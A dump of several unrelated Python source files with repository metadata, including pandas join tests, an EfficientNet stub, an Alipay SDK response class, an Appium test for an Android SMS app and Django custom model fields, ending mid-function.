df = DataFrame({"a": a, "b": b, "c": c})
xpdf = DataFrame({"a": a, "b": b, "c": c})
s = DataFrame(np.random.random(5).astype("float32"), columns=["md"])
rs = df.merge(s, left_on="a", right_index=True)
assert rs.dtypes["a"] == "int64"
assert rs.dtypes["b"] == "float64"
assert rs.dtypes["c"] == "float32"
assert rs.dtypes["md"] == "float32"
xp = xpdf.merge(s, left_on="a", right_index=True)
tm.assert_frame_equal(rs, xp)
def test_join_many_non_unique_index(self):
df1 = DataFrame({"a": [1, 1], "b": [1, 1], "c": [10, 20]})
df2 = DataFrame({"a": [1, 1], "b": [1, 2], "d": [100, 200]})
df3 = DataFrame({"a": [1, 1], "b": [1, 2], "e": [1000, 2000]})
idf1 = df1.set_index(["a", "b"])
idf2 = df2.set_index(["a", "b"])
idf3 = df3.set_index(["a", "b"])
result = idf1.join([idf2, idf3], how="outer")
df_partially_merged = merge(df1, df2, on=["a", "b"], how="outer")
expected = merge(df_partially_merged, df3, on=["a", "b"], how="outer")
result = result.reset_index()
expected = expected[result.columns]
expected["a"] = expected.a.astype("int64")
expected["b"] = expected.b.astype("int64")
tm.assert_frame_equal(result, expected)
df1 = DataFrame({"a": [1, 1, 1], "b": [1, 1, 1], "c": [10, 20, 30]})
df2 = DataFrame({"a": [1, 1, 1], "b": [1, 1, 2], "d": [100, 200, 300]})
df3 = DataFrame({"a": [1, 1, 1], "b": [1, 1, 2], "e": [1000, 2000, 3000]})
idf1 = df1.set_index(["a", "b"])
idf2 = df2.set_index(["a", "b"])
idf3 = df3.set_index(["a", "b"])
result = idf1.join([idf2, idf3], how="inner")
df_partially_merged = merge(df1, df2, on=["a", "b"], how="inner")
expected = merge(df_partially_merged, df3, on=["a", "b"], how="inner")
result = result.reset_index()
tm.assert_frame_equal(result, expected.loc[:, result.columns])
# GH 11519
df = DataFrame(
{
"A": ["foo", "bar", "foo", "bar", "foo", "bar", "foo", "foo"],
"B": ["one", "one", "two", "three", "two", "two", "one", "three"],
"C": np.random.randn(8),
"D": np.random.randn(8),
}
)
s = Series(
np.repeat(np.arange(8), 2), index=np.repeat(np.arange(8), 2), name="TEST"
)
inner = df.join(s, how="inner")
outer = df.join(s, how="outer")
left = df.join(s, how="left")
right = df.join(s, how="right")
tm.assert_frame_equal(inner, outer)
tm.assert_frame_equal(inner, left)
tm.assert_frame_equal(inner, right)
def test_join_sort(self):
left = DataFrame({"key": ["foo", "bar", "baz", "foo"], "value": [1, 2, 3, 4]})
right = DataFrame({"value2": ["a", "b", "c"]}, index=["bar", "baz", "foo"])
joined = left.join(right, on="key", sort=True)
expected = DataFrame(
{
"key": ["bar", "baz", "foo", "foo"],
"value": [2, 3, 1, 4],
"value2": ["a", "b", "c", "c"],
},
index=[1, 2, 0, 3],
)
tm.assert_frame_equal(joined, expected)
# smoke test
joined = left.join(right, on="key", sort=False)
tm.assert_index_equal(joined.index, pd.Index(list(range(4))))
def test_join_mixed_non_unique_index(self):
# GH 12814, unorderable types in py3 with a non-unique index
df1 = DataFrame({"a": [1, 2, 3, 4]}, index=[1, 2, 3, "a"])
df2 = DataFrame({"b": [5, 6, 7, 8]}, index=[1, 3, 3, 4])
result = df1.join(df2)
expected = DataFrame(
{"a": [1, 2, 3, 3, 4], "b": [5, np.nan, 6, 7, np.nan]},
index=[1, 2, 3, 3, "a"],
)
tm.assert_frame_equal(result, expected)
df3 = DataFrame({"a": [1, 2, 3, 4]}, index=[1, 2, 2, "a"])
df4 = DataFrame({"b": [5, 6, 7, 8]}, index=[1, 2, 3, 4])
result = df3.join(df4)
expected = DataFrame(
{"a": [1, 2, 3, 4], "b": [5, 6, 6, np.nan]}, index=[1, 2, 2, "a"]
)
tm.assert_frame_equal(result, expected)
def test_join_non_unique_period_index(self):
# GH #16871
index = pd.period_range("2016-01-01", periods=16, freq="M")
df = DataFrame(list(range(len(index))), index=index, columns=["pnum"])
df2 = concat([df, df])
result = df.join(df2, how="inner", rsuffix="_df2")
expected = DataFrame(
np.tile(np.arange(16, dtype=np.int64).repeat(2).reshape(-1, 1), 2),
columns=["pnum", "pnum_df2"],
index=df2.sort_index().index,
)
tm.assert_frame_equal(result, expected)
def test_mixed_type_join_with_suffix(self):
# GH #916
df = DataFrame(np.random.randn(20, 6), columns=["a", "b", "c", "d", "e", "f"])
df.insert(0, "id", 0)
df.insert(5, "dt", "foo")
grouped = df.groupby("id")
mn = grouped.mean()
cn = grouped.count()
# it works!
mn.join(cn, rsuffix="_right")
def test_join_many(self):
df = DataFrame(np.random.randn(10, 6), columns=list("abcdef"))
df_list = [df[["a", "b"]], df[["c", "d"]], df[["e", "f"]]]
joined = df_list[0].join(df_list[1:])
tm.assert_frame_equal(joined, df)
df_list = [df[["a", "b"]][:-2], df[["c", "d"]][2:], df[["e", "f"]][1:9]]
def _check_diff_index(df_list, result, exp_index):
reindexed = [x.reindex(exp_index) for x in df_list]
expected = reindexed[0].join(reindexed[1:])
tm.assert_frame_equal(result, expected)
# different join types
joined = df_list[0].join(df_list[1:], how="outer")
_check_diff_index(df_list, joined, df.index)
joined = df_list[0].join(df_list[1:])
_check_diff_index(df_list, joined, df_list[0].index)
joined = df_list[0].join(df_list[1:], how="inner")
_check_diff_index(df_list, joined, df.index[2:8])
msg = "Joining multiple DataFrames only supported for joining on index"
with pytest.raises(ValueError, match=msg):
df_list[0].join(df_list[1:], on="a")
def test_join_many_mixed(self):
df = DataFrame(np.random.randn(8, 4), columns=["A", "B", "C", "D"])
df["key"] = ["foo", "bar"] * 4
df1 = df.loc[:, ["A", "B"]]
df2 = df.loc[:, ["C", "D"]]
df3 = df.loc[:, ["key"]]
result = df1.join([df2, df3])
tm.assert_frame_equal(result, df)
def test_join_dups(self):
# joining dups
df = concat(
[
DataFrame(np.random.randn(10, 4), columns=["A", "A", "B", "B"]),
DataFrame(
np.random.randint(0, 10, size=20).reshape(10, 2), columns=["A", "C"]
),
],
axis=1,
)
expected = concat([df, df], axis=1)
result = df.join(df, rsuffix="_2")
result.columns = expected.columns
tm.assert_frame_equal(result, expected)
# GH 4975, invalid join on dups
w = DataFrame(np.random.randn(4, 2), columns=["x", "y"])
x = DataFrame(np.random.randn(4, 2), columns=["x", "y"])
y = DataFrame(np.random.randn(4, 2), columns=["x", "y"])
z = DataFrame(np.random.randn(4, 2), columns=["x", "y"])
dta = x.merge(y, left_index=True, right_index=True).merge(
z, left_index=True, right_index=True, how="outer"
)
dta = dta.merge(w, left_index=True, right_index=True)
expected = concat([x, y, z, w], axis=1)
expected.columns = ["x_x", "y_x", "x_y", "y_y", "x_x", "y_x", "x_y", "y_y"]
tm.assert_frame_equal(dta, expected)
def test_join_multi_to_multi(self, join_type):
# GH 20475
leftindex = MultiIndex.from_product(
[list("abc"), list("xy"), [1, 2]], names=["abc", "xy", "num"]
)
left = DataFrame({"v1": range(12)}, index=leftindex)
rightindex = MultiIndex.from_product(
[list("abc"), list("xy")], names=["abc", "xy"]
)
right = DataFrame({"v2": [100 * i for i in range(1, 7)]}, index=rightindex)
result = left.join(right, on=["abc", "xy"], how=join_type)
expected = (
left.reset_index()
.merge(right.reset_index(), on=["abc", "xy"], how=join_type)
.set_index(["abc", "xy", "num"])
)
tm.assert_frame_equal(expected, result)
msg = r'len\(left_on\) must equal the number of levels in the index of "right"'
with pytest.raises(ValueError, match=msg):
left.join(right, on="xy", how=join_type)
with pytest.raises(ValueError, match=msg):
right.join(left, on=["abc", "xy"], how=join_type)
def test_join_on_tz_aware_datetimeindex(self):
# GH 23931, 26335
df1 = pd.DataFrame(
{
"date": pd.date_range(
start="2018-01-01", periods=5, tz="America/Chicago"
),
"vals": list("abcde"),
}
)
df2 = pd.DataFrame(
{
"date": pd.date_range(
start="2018-01-03", periods=5, tz="America/Chicago"
),
"vals_2": list("tuvwx"),
}
)
result = df1.join(df2.set_index("date"), on="date")
expected = df1.copy()
expected["vals_2"] = pd.Series([np.nan] * 2 + list("tuv"), dtype=object)
tm.assert_frame_equal(result, expected)
def test_join_datetime_string(self):
# GH 5647
dfa = DataFrame(
[
["2012-08-02", "L", 10],
["2012-08-02", "J", 15],
["2013-04-06", "L", 20],
["2013-04-06", "J", 25],
],
columns=["x", "y", "a"],
)
dfa["x"] = pd.to_datetime(dfa["x"])
dfb = DataFrame(
[["2012-08-02", "J", 1], ["2013-04-06", "L", 2]],
columns=["x", "y", "z"],
index=[2, 4],
)
dfb["x"] = pd.to_datetime(dfb["x"])
result = dfb.join(dfa.set_index(["x", "y"]), on=["x", "y"])
expected = DataFrame(
[
[pd.Timestamp("2012-08-02 00:00:00"), "J", 1, 15],
[pd.Timestamp("2013-04-06 00:00:00"), "L", 2, 20],
],
index=[2, 4],
columns=["x", "y", "z", "a"],
)
tm.assert_frame_equal(result, expected)
def _check_join(left, right, result, join_col, how="left", lsuffix="_x", rsuffix="_y"):
    """Validate *result* as the outcome of joining *left* and *right* on *join_col*.

    For every key group of *result*: if the key exists in the corresponding
    input, the suffix-stripped columns must reproduce that input's rows;
    otherwise (only legal for the non-driving side of a left/right/outer
    join) those columns must be entirely NA.
    """
    # some smoke tests
    for c in join_col:
        assert result[c].notna().all()

    left_grouped = left.groupby(join_col)
    right_grouped = right.groupby(join_col)

    for group_key, group in result.groupby(join_col):
        # Split the joined group back into its left- and right-derived columns.
        l_joined = _restrict_to_columns(group, left.columns, lsuffix)
        r_joined = _restrict_to_columns(group, right.columns, rsuffix)

        try:
            lgroup = left_grouped.get_group(group_key)
        except KeyError as err:
            # Key absent from `left`: only allowed when `left` doesn't drive the join.
            if how in ("left", "inner"):
                raise AssertionError(
                    f"key {group_key} should not have been in the join"
                ) from err

            _assert_all_na(l_joined, left.columns, join_col)
        else:
            _assert_same_contents(l_joined, lgroup)

        try:
            rgroup = right_grouped.get_group(group_key)
        except KeyError as err:
            # Key absent from `right`: only allowed when `right` doesn't drive the join.
            if how in ("right", "inner"):
                raise AssertionError(
                    f"key {group_key} should not have been in the join"
                ) from err

            _assert_all_na(r_joined, right.columns, join_col)
        else:
            _assert_same_contents(r_joined, rgroup)
def _restrict_to_columns(group, columns, suffix):
found = [
c for c in group.columns if c in columns or c.replace(suffix, "") in columns
]
# filter
group = group.loc[:, found]
# get rid of suffixes, if any
group = group.rename(columns=lambda x: x.replace(suffix, ""))
# put in the right order...
group = group.loc[:, columns]
return group
def _assert_same_contents(join_chunk, source):
NA_SENTINEL = -1234567 # drop_duplicates not so NA-friendly...
jvalues = join_chunk.fillna(NA_SENTINEL).drop_duplicates().values
svalues = source.fillna(NA_SENTINEL).drop_duplicates().values
rows = {tuple(row) for row in jvalues}
assert len(rows) == len(source)
assert all(tuple(row) in rows for row in svalues)
def _assert_all_na(join_chunk, source_columns, join_col):
for c in source_columns:
if c in join_col:
continue
assert join_chunk[c].isna().all()
def _join_by_hand(a, b, how="left"):
join_index = a.index.join(b.index, how=how)
a_re = a.reindex(join_index)
b_re = b.reindex(join_index)
result_columns = a.columns.append(b.columns)
for col, s in b_re.items():
a_re[col] = s
return a_re.reindex(columns=result_columns)
| [
"kd619@ic.ac.uk"
] | kd619@ic.ac.uk |
b0b6eab9b83d55d521265d739f7a459d8fef349c | 860c31e414c4c280b70ec0872042d715a2d56978 | /torch_ecg/models/cnn/efficientnet.py | ee0521f6eb097623f4385fdca0f8d28cfb057f82 | [
"MIT"
] | permissive | DeepPSP/torch_ecg | 255e49ff436e13044a1f049141f982680e56970e | a40c65f4fefa83ba7d3d184072a4c05627b7e226 | refs/heads/master | 2023-09-01T06:47:17.153216 | 2023-08-31T18:00:47 | 2023-08-31T18:00:47 | 298,482,237 | 111 | 16 | MIT | 2023-08-21T11:25:07 | 2020-09-25T06:03:17 | Python | UTF-8 | Python | false | false | 2,317 | py | """
EfficientNet.
References
----------
1. Tan, M., & Le, Q. V. (2019). Efficientnet: Rethinking model scaling for convolutional neural networks. arXiv preprint arXiv:1905.11946.
2. Tan, M., & Le, Q. V. (2021). Efficientnetv2: Smaller models and faster training. arXiv preprint arXiv:2104.00298.
3. https://github.com/google/automl
"""
from typing import List
from torch import nn
from ...models._nets import ( # noqa: F401
Conv_Bn_Activation,
DownSample,
GlobalContextBlock,
NonLocalBlock,
SEBlock,
)
from ...utils import SizeMixin, CitationMixin
__all__ = [
"EfficientNet",
]
class EfficientNet(nn.Module, SizeMixin, CitationMixin):
    """Placeholder for the EfficientNet CNN backbone (not implemented yet).

    Reference
    ---------
    1. Tan, M., & Le, Q. V. (2019). Efficientnet: Rethinking model scaling for convolutional neural networks. arXiv preprint arXiv:1905.11946.
    2. https://github.com/lukemelas/EfficientNet-PyTorch/blob/master/efficientnet_pytorch/model.py
    3. https://github.com/rwightman/pytorch-image-models/blob/master/timm/models/efficientnet.py
    4. https://github.com/google/automl
    """

    __name__ = "EfficientNet"

    def __init__(self, in_channels: int, **config) -> None:
        # stub constructor: always raises until the architecture is implemented
        super().__init__()
        raise NotImplementedError

    def forward(self):
        raise NotImplementedError

    def compute_output_shape(self):
        raise NotImplementedError

    @property
    def doi(self) -> List[str]:
        # NOTE(review): `self.config` is never assigned anywhere in this class
        # (the constructor raises), so this property would fail if the stub
        # were ever instantiated -- revisit once the class is implemented.
        return list(set(self.config.get("doi", []) + ["10.48550/ARXIV.1905.11946"]))
class EfficientNetV2(nn.Module, SizeMixin):
    """Placeholder for the EfficientNetV2 CNN backbone (not implemented yet).

    Reference
    ---------
    1. Tan, M., & Le, Q. V. (2021). Efficientnetv2: Smaller models and faster training. arXiv preprint arXiv:2104.00298.
    2. https://github.com/d-li14/efficientnetv2.pytorch/blob/main/effnetv2.py
    3. https://github.com/lukemelas/EfficientNet-PyTorch/blob/master/efficientnet_pytorch/model.py
    4. https://github.com/rwightman/pytorch-image-models/blob/master/timm/models/efficientnet.py
    5. https://github.com/google/automl
    """

    __name__ = "EfficientNetV2"

    def __init__(self, in_channels: int, **config) -> None:
        # stub constructor: always raises until the architecture is implemented
        super().__init__()
        raise NotImplementedError

    def forward(self):
        raise NotImplementedError

    def compute_output_shape(self):
        raise NotImplementedError
| [
"wenh06@gmail.com"
] | wenh06@gmail.com |
02850738d65612e07d146e31e9908775f0fcd8a5 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/response/AlipayEbppInstserviceDeductSignResponse.py | c249afbff2e18df95caf317c18a1120b1533b56f | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 1,026 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayEbppInstserviceDeductSignResponse(AlipayResponse):
    """Response wrapper exposing ``error_code`` and ``process_id``."""

    def __init__(self):
        super(AlipayEbppInstserviceDeductSignResponse, self).__init__()
        self._error_code = None
        self._process_id = None

    @property
    def error_code(self):
        return self._error_code

    @error_code.setter
    def error_code(self, value):
        self._error_code = value

    @property
    def process_id(self):
        return self._process_id

    @process_id.setter
    def process_id(self, value):
        self._process_id = value

    def parse_response_content(self, response_content):
        """Populate the fields that are present in the parsed payload."""
        response = super(AlipayEbppInstserviceDeductSignResponse, self).parse_response_content(response_content)
        for key in ('error_code', 'process_id'):
            if key in response:
                setattr(self, key, response[key])
| [
"jiandong.jd@antfin.com"
] | jiandong.jd@antfin.com |
b48ba99ef0bcc9fec5618036a29b6dce473fd246 | f22d31484a12d001826c1775a6f2d245a720fce8 | /Introdução à Programação com Python/Do autor/Códigi fonte e listagem/listagem/capitulo 08/08.26 - Funções como parâmetro.py | fda15eae9a584a943ce075871ac6c0de07ce0b35 | [] | no_license | eduardoprograma/linguagem_Python | 9eb55f0a5a432a986e047b091eb7ed7152b7da67 | 942aba9146800fc33bbea98778467f837396cb93 | refs/heads/master | 2021-07-07T20:48:37.673101 | 2020-07-31T21:24:17 | 2020-07-31T21:24:17 | 159,852,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,012 | py | ##############################################################################
# Parte do livro Introdução à Programação com Python
# Autor: Nilo Ney Coutinho Menezes
# Editora Novatec (c) 2010-2017
# Primeira edição - Novembro/2010 - ISBN 978-85-7522-250-8
# Primeira reimpressão - Outubro/2011
# Segunda reimpressão - Novembro/2012
# Terceira reimpressão - Agosto/2013
# Segunda edição - Junho/2014 - ISBN 978-85-7522-408-3
# Primeira reimpressão - Segunda edição - Maio/2015
# Segunda reimpressão - Segunda edição - Janeiro/2016
# Terceira reimpressão - Segunda edição - Junho/2016
# Quarta reimpressão - Segunda edição - Março/2017
#
# Site: http://python.nilo.pro.br/
#
# Arquivo: listagem\capitulo 08\08.26 - Funções como parâmetro.py
##############################################################################
def soma(a, b):
    """Return the sum of ``a`` and ``b``."""
    return a + b


def subtração(a, b):
    """Return ``a`` minus ``b``."""
    return a - b


def imprime(a, b, foper):
    """Apply the operator function ``foper`` to ``a`` and ``b`` and print the result."""
    print(foper(a, b))


# demonstrate passing functions as parameters
imprime(5, 4, soma)
imprime(10, 1, subtração)
| [
"eduardo.candido@fatec.sp.gov.br"
] | eduardo.candido@fatec.sp.gov.br |
cf444680091fffcf6b4f9fadb2a2ffe558bc5918 | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/websms/testcase/firstcases/testcase13_003.py | 0e57a4f0d4f2d8752508b328d7bed313c340ee1a | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,362 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
# Appium capabilities: drive the WebSMS app on an Android 4.4 emulator, with
# JaCoCo instrumentation enabled so coverage can be dumped after the test.
desired_caps = {
    'platformName' : 'Android',
    'deviceName' : 'Android Emulator',
    'platformVersion' : '4.4',
    'appPackage' : 'de.ub0r.android.websms',
    'appActivity' : 'de.ub0r.android.websms.WebSMS',
    'resetKeyboard' : True,
    'androidCoverage' : 'de.ub0r.android.websms/de.ub0r.android.websms.JacocoInstrumentation',
    'noReset' : True
}
def command(cmd, timeout=5):
    """Run *cmd* in a shell, wait *timeout* seconds, then terminate it."""
    proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    time.sleep(timeout)
    proc.terminate()
def getElememt(driver, str):
    # Retry the UiAutomator lookup up to 5 times (1 s apart); as a last
    # resort tap (50, 50) to dismiss any overlay and try once more, letting
    # a final NoSuchElementException propagate.
    # NOTE: the parameter `str` shadows the builtin.
    for i in range(0, 5, 1):
        try:
            element = driver.find_element_by_android_uiautomator(str)
        except NoSuchElementException:
            time.sleep(1)
        else:
            return element
    os.popen("adb shell input tap 50 50")
    element = driver.find_element_by_android_uiautomator(str)
    return element
def getElememtBack(driver, str1, str2):
    # Try the primary selector `str1` twice, then fall back to `str2` with
    # up to 5 retries; finally tap (50, 50) and try `str2` once more.
    for i in range(0, 2, 1):
        try:
            element = driver.find_element_by_android_uiautomator(str1)
        except NoSuchElementException:
            time.sleep(1)
        else:
            return element
    for i in range(0, 5, 1):
        try:
            element = driver.find_element_by_android_uiautomator(str2)
        except NoSuchElementException:
            time.sleep(1)
        else:
            return element
    os.popen("adb shell input tap 50 50")
    element = driver.find_element_by_android_uiautomator(str2)
    return element
def swipe(driver, startxper, startyper, endxper, endyper):
    # Swipe between two points given as fractions of the window size,
    # retrying once after 1 s if the driver raises WebDriverException.
    size = driver.get_window_size()
    width = size["width"]
    height = size["height"]
    try:
        driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
                     end_y=int(height * endyper), duration=1000)
    except WebDriverException:
        time.sleep(1)
        driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
                     end_y=int(height * endyper), duration=1000)
    return
def scrollToFindElement(driver, str):
    # Search for the selector while scrolling: 5 attempts swiping downwards,
    # then 4 attempts swiping back upwards. When several matches exist, the
    # last enabled one wins. Returns None if never found.
    for i in range(0, 5, 1):
        try:
            element = driver.find_element_by_android_uiautomator(str)
            elements = driver.find_elements_by_android_uiautomator(str)
            if (len(elements) > 1):
                for temp in elements:
                    if temp.get_attribute("enabled") == "true":
                        element = temp
                        break
        except NoSuchElementException:
            swipe(driver, 0.5, 0.55, 0.5, 0.2)
        else:
            return element
    for i in range(0, 4, 1):
        try:
            element = driver.find_element_by_android_uiautomator(str)
            elements = driver.find_elements_by_android_uiautomator(str)
            if (len(elements) > 1):
                for temp in elements:
                    if temp.get_attribute("enabled") == "true":
                        element = temp
                        break
        except NoSuchElementException:
            swipe(driver, 0.5, 0.2, 0.5, 0.55)
        else:
            return element
    return
def scrollToClickElement(driver, str):
    # Scroll until the selector is found, then click it (no-op when absent).
    element = scrollToFindElement(driver, str)
    if element is None:
        return
    else:
        element.click()
def clickInList(driver, str):
    # Click an entry in a list dialog. With no selector, pick the last
    # CheckedTextView when a dialog window is open; otherwise scroll to the
    # selector. If nothing was found and a dialog is open, press BACK (4).
    element = None
    if (str is None):
        candidates = driver.find_elements_by_class_name("android.widget.CheckedTextView")
        if len(candidates) >= 1 and checkWindow(driver):
            element = candidates[len(candidates)-1]
    else:
        element = scrollToFindElement(driver, str)
    if element is not None:
        element.click()
    else:
        if checkWindow(driver):
            driver.press_keycode(4)
def clickOnCheckable(driver, str, value="true"):
    # Find the LinearLayout row containing the selector and toggle its
    # checkable child until its "checked" attribute equals *value*.
    parents = driver.find_elements_by_class_name("android.widget.LinearLayout")
    for parent in parents:
        try:
            parent.find_element_by_android_uiautomator(str)
            lists = parent.find_elements_by_class_name("android.widget.LinearLayout")
            if len(lists) == 1:
                innere = parent.find_element_by_android_uiautomator("new UiSelector().checkable(true)")
                nowvalue = innere.get_attribute("checked")
                if (nowvalue != value):
                    innere.click()
                break
        except NoSuchElementException:
            continue
def typeText(driver, value):
    # Type *value* into the first EditText, then confirm via the "OK" button;
    # if there is no OK button but a dialog is open, press BACK (4).
    element = getElememt(driver, "new UiSelector().className(\"android.widget.EditText\")")
    element.clear()
    element.send_keys(value)
    enterelement = getElememt(driver, "new UiSelector().text(\"OK\")")
    if (enterelement is None):
        if checkWindow(driver):
            driver.press_keycode(4)
    else:
        enterelement.click()
def checkWindow(driver):
    # Heuristic for "a dialog window is open": the top FrameLayout is
    # shorter than the full driver window.
    dsize = driver.get_window_size()
    nsize = driver.find_element_by_class_name("android.widget.FrameLayout").size
    if dsize['height'] > nsize['height']:
        return True
    else:
        return False
def testingSeekBar(driver, str, value):
    # Locate the SeekBar (near the selector, or directly when a dialog is
    # open), drag it to *value* (fraction 0..1) and confirm with "OK".
    try:
        if (not checkWindow(driver)):
            element = seekForNearestSeekBar(driver, str)
        else:
            element = driver.find_element_by_class_name("android.widget.SeekBar")
        if (None != element):
            settingSeekBar(driver, element, value)
            driver.find_element_by_android_uiautomator("new UiSelector().text(\"OK\")").click()
    except NoSuchElementException:
        time.sleep(1)
def seekForNearestSeekBar(driver, str):
    # Return the SeekBar inside the LinearLayout row that also matches the
    # selector; implicitly returns None when no row matches.
    parents = driver.find_elements_by_class_name("android.widget.LinearLayout")
    for parent in parents:
        try:
            parent.find_element_by_android_uiautomator(str)
            lists = parent.find_elements_by_class_name("android.widget.LinearLayout")
            if len(lists) == 1:
                innere = parent.find_element_by_class_name("android.widget.SeekBar")
                return innere
                break  # unreachable: kept as in the original
        except NoSuchElementException:
            continue
def settingSeekBar(driver, element, value):
    """Drag the SeekBar *element* so its handle sits at fraction *value* (0..1).

    Presses just inside the left edge at mid-height, then moves to
    ``x + width * value`` and releases.
    """
    x = element.rect.get("x")
    y = element.rect.get("y")
    width = element.rect.get("width")
    height = element.rect.get("height")
    TouchAction(driver).press(None, x + 10, y + height/2).move_to(None, x + width * value, y + height/2).release().perform()
    # removed dead `y = value` rebinding: y was only used above and the
    # assignment had no effect
def clickInMultiList(driver, str):
    # Like clickInList, but for multi-select dialogs: check the entry if it
    # is not already checked, then confirm with "OK" when a dialog is open.
    element = None
    if (str is None):
        candidates = driver.find_elements_by_class_name("android.widget.CheckedTextView")
        if len(candidates) >= 1 and checkWindow(driver):
            element = candidates[len(candidates)-1]
    else:
        element = scrollToFindElement(driver, str)
    if element is not None:
        nowvalue = element.get_attribute("checked")
        if (nowvalue != "true"):
            element.click()
        if checkWindow(driver):
            driver.find_element_by_android_uiautomator("new UiSelector().text(\"OK\")").click()
# testcase13_003
# Main test scenario (Python 2 syntax): connect to the local Appium server,
# long-press the "send" item, open the menu (keycode 82) and tap
# "Donate/remove ads"; afterwards dump the JaCoCo coverage and stop the app
# if the foreground package changed.
try:
    starttime = time.time()
    driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
    element = getElememt(driver, "new UiSelector().resourceId(\"de.ub0r.android.websms:id/item_send\").className(\"android.widget.TextView\")")
    TouchAction(driver).long_press(element).release().perform()
    driver.press_keycode(82)
    element = getElememtBack(driver, "new UiSelector().text(\"Donate/remove ads\")", "new UiSelector().className(\"android.widget.TextView\").instance(1)")
    TouchAction(driver).tap(element).perform()
except Exception, e:
    print 'FAIL'
    print 'str(e):\t\t', str(e)
    print 'repr(e):\t', repr(e)
    print traceback.format_exc()
else:
    print 'OK'
finally:
    cpackage = driver.current_package
    endtime = time.time()
    print 'consumed time:', str(endtime - starttime), 's'
    command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"13_003\"")
    jacocotime = time.time()
    print 'jacoco time:', str(jacocotime - endtime), 's'
    driver.quit()
    if (cpackage != 'de.ub0r.android.websms'):
        cpackage = "adb shell am force-stop " + cpackage
        os.popen(cpackage)
"prefest2018@gmail.com"
] | prefest2018@gmail.com |
f1abe9b49397d2ab709e03ce4589f5b19498c455 | 3b574a8d1f9cd0bde99f2e94c3c6e7b59ab46ee3 | /project/apps/core/fields.py | ac9c8184ec24e84bb7848ffeecbfdcb6a207b9c7 | [
"BSD-2-Clause"
] | permissive | barberscore/archive-api | 7ac908d2754f6fa5c387bf6e49c257424887f9b3 | d6cf8867ad60c6ae334a555881c06c71069fa12c | refs/heads/master | 2023-02-24T19:45:23.973475 | 2022-01-26T14:35:10 | 2022-01-26T14:35:10 | 202,747,844 | 0 | 0 | BSD-2-Clause | 2023-02-08T00:52:56 | 2019-08-16T15:01:15 | Python | UTF-8 | Python | false | false | 4,383 | py | import os
import string
from datetime import date
import phonenumbers
import six
import pytz
from django.db.models import EmailField, CharField, DateField
from django.core.validators import validate_email
from django.core.exceptions import ValidationError
from django.utils.deconstruct import deconstructible
from rest_framework_json_api import serializers
from django.contrib.postgres.fields import ArrayField
from django.forms import MultipleChoiceField
@deconstructible
class UploadPath(object):
    """Callable upload-path builder: ``<app_label>/<model_name>/<name>/<pk>``."""

    def __init__(self, name):
        self.name = name

    def __call__(self, instance, filename):
        # note: the original filename is intentionally ignored
        meta = instance._meta
        return os.path.join(meta.app_label, meta.model_name, self.name, str(instance.id))
class LowerEmailField(EmailField):
    # EmailField that lowercases values before they are written to the DB.
    # NOTE(review): a second class with this same name is defined later in
    # this module (read-side from_db_value version) and shadows this one.
    def get_prep_value(self, value):
        value = super().get_prep_value(value)
        if value is not None:
            value = value.lower()
        return value
class DivisionsField(ArrayField):
    # ArrayField rendered as a plain MultipleChoiceField using the base
    # field's choices.
    def formfield(self, **kwargs):
        defaults = {
            'form_class': MultipleChoiceField,
            'choices': self.base_field.choices,
        }
        defaults.update(kwargs)
        # Skip our parent's formfield implementation completely as we don't
        # care for it.
        # pylint:disable=bad-super-call
        return super(ArrayField, self).formfield(**defaults)

    def to_python(self, value):
        # Coerce each element through the base field's to_python.
        # NOTE(review): when `res` is not a list, the *raw* input value is
        # returned unchanged (not `res`) -- confirm that is intentional.
        res = super().to_python(value)
        if isinstance(res, list):
            value = [self.base_field.to_python(val) for val in res]
        return value
class TimezoneField(serializers.Field):
    # DRF field serializing pytz timezones to/from their string names.
    # NOTE(review): an identical class of the same name is re-defined at the
    # bottom of this module and shadows this one.
    def to_representation(self, obj):
        return six.text_type(obj)

    def to_internal_value(self, data):
        try:
            return pytz.timezone(str(data))
        except pytz.exceptions.UnknownTimeZoneError:
            raise ValidationError('Unknown timezone')
class ValidatedPhoneField(CharField):
    # CharField that normalizes stored phone numbers to E.164 on read;
    # values that cannot be parsed come back as "".
    def from_db_value(self, value, expression, connection):
        try:
            # 'US' is the default parsing region for numbers without a prefix
            value = phonenumbers.parse(value, 'US')
        except phonenumbers.NumberParseException:
            return ""
        return phonenumbers.format_number(value, phonenumbers.PhoneNumberFormat.E164)
class LowerEmailField(EmailField):
    # NOTE(review): this re-definition shadows the LowerEmailField declared
    # earlier in this module (which lowercased on *write* via
    # get_prep_value); only this read-side version takes effect. The two
    # should probably be merged into a single class.
    def from_db_value(self, value, expression, connection):
        # invalid stored addresses read back as None; valid ones lowercased
        try:
            validate_email(value)
        except ValidationError:
            return None
        return value.lower()
class VoicePartField(CharField):
    """CharField that normalizes stored voice-part labels on read."""

    def from_db_value(self, value, expression, connection):
        part_map = {
            'tenor': 'tenor',
            'lead': 'lead',
            'baritone': 'baritone',
            'bass': 'bass',
        }
        try:
            key = value.lower().strip()
        except AttributeError:
            # value is None or otherwise not a string
            return None
